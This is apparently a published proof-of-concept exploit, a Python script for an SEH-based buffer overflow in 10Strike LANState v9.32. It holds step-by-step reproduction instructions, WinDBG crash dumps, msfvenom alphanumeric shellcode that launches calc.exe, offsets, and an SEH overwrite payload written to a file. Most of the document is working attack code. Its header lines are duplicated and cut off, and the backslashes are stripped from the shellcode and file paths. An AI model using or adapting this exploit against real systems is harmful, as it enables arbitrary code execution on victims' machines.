# Exploit Title: 10Strike LANState - Host Check hostname Buffer Overflow (SEH)
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lan #!/usr/bin/python
# Exploit Title: 10Strike LANState - Host Check hostname Buffer Overflow (SEH)
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
# Date: 2020-04-01
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage: https://www.freecommander.com
# Tested on: Win7 x86 SP1 - Build 7601
# Description:
# - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH.
# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open LANState, use any "Map", for example the "demo_map"
# - Click on tab "Home", click option "Check List"
# - Rightclick on any existing hostname and click "Edit"
# - Paste the value from clipboard in the field "Host address (name)"
# - Next, Next, Finish
# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
# - Check results
# WinDBG initial crash output using only A's:
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:Program Files10-Strike LANStateLANState.exe
# LANState+0x2e57:
# 00402e57 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???
import sys,struct
# Filename
filename = "10_strike_lanstate-poc.txt"
# Maximum length
maxlen = 10000
# Shellcode, using alphanum chars due to bytes considered to be bad above x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
# Payload size: 447 bytes
shellcode = (
"xdbxdcxd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx78x68x6dx52x65x50x37x70x77x70x43x50x4dx59"
"x39x75x36x51x59x50x32x44x6ex6bx32x70x46x50x6e"
"x6bx70x52x34x4cx6ex6bx61x42x45x44x4cx4bx54x32"
"x47x58x36x6fx6ex57x53x7ax66x46x46x51x79x6fx4e"
"x4cx37x4cx51x71x53x4cx44x42x44x6cx61x30x4ax61"
"x68x4fx66x6dx73x31x49x57x59x72x58x72x30x52x56"
"x37x4ex6bx52x72x34x50x6cx4bx33x7ax35x6cx6cx4b"
"x42x6cx57x61x74x38x6dx33x33x78x77x71x4bx61x32"
"x71x6ex6bx51x49x77x50x76x61x6ax73x6ex6bx61x59"
"x67x68x79x73x57x4ax42x69x4ex6bx37x44x6cx4bx43"
"x31x4ex36x45x61x6bx4fx6cx6cx6ax61x48x4fx34x4d"
"x47x71x5ax67x37x48x39x70x62x55x4bx46x65x53x63"
"x4dx39x68x67x4bx73x4dx46x44x53x45x79x74x76x38"
"x4cx4bx63x68x66x44x43x31x48x53x72x46x4ex6bx76"
"x6cx70x4bx4ex6bx61x48x57x6cx46x61x79x43x6cx4b"
"x54x44x6ex6bx57x71x68x50x6ex69x30x44x76x44x45"
"x74x53x6bx61x4bx65x31x62x79x31x4ax30x51x39x6f"
"x59x70x63x6fx71x4fx50x5ax6cx4bx56x72x4ax4bx6c"
"x4dx73x6dx30x6ax77x71x6ex6dx4dx55x4ex52x37x70"
"x75x50x63x30x52x70x63x58x56x51x4ex6bx42x4fx4e"
"x67x69x6fx49x45x4dx6bx58x70x4dx65x6dx72x50x56"
"x75x38x6ex46x6fx65x6fx4dx6dx4dx39x6fx58x55x75"
"x6cx63x36x73x4cx76x6ax6bx30x59x6bx4dx30x52x55"
"x74x45x6fx4bx43x77x42x33x63x42x62x4fx51x7ax77"
"x70x73x63x69x6fx58x55x72x43x30x61x72x4cx31x73"
"x46x4ex45x35x63x48x63x55x47x70x41x41"
)
# Offsets
crash_ebp = 228
crash_nseh = 236
crash_seh = crash_nseh + 4
# Variables
nops = "x90" * 16 # Nops
# Prefix
prefix = "A" * crash_nseh # Filler
nseh = "x71x06x70x04" # JNO # JO # Jump over NSEH/SEH
seh = struct.pack("<L", 0x0132730f) # call dword ptr ss:[ebp-04] # [LANState.exe]
suffix = nops # Old-school NOP'ing
suffix += shellcode # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler
# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together
try:
file = open(filename,"wb")
file.write(payload)
file.close()
print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
print "[!] Error creating file!"
sys.exit(0)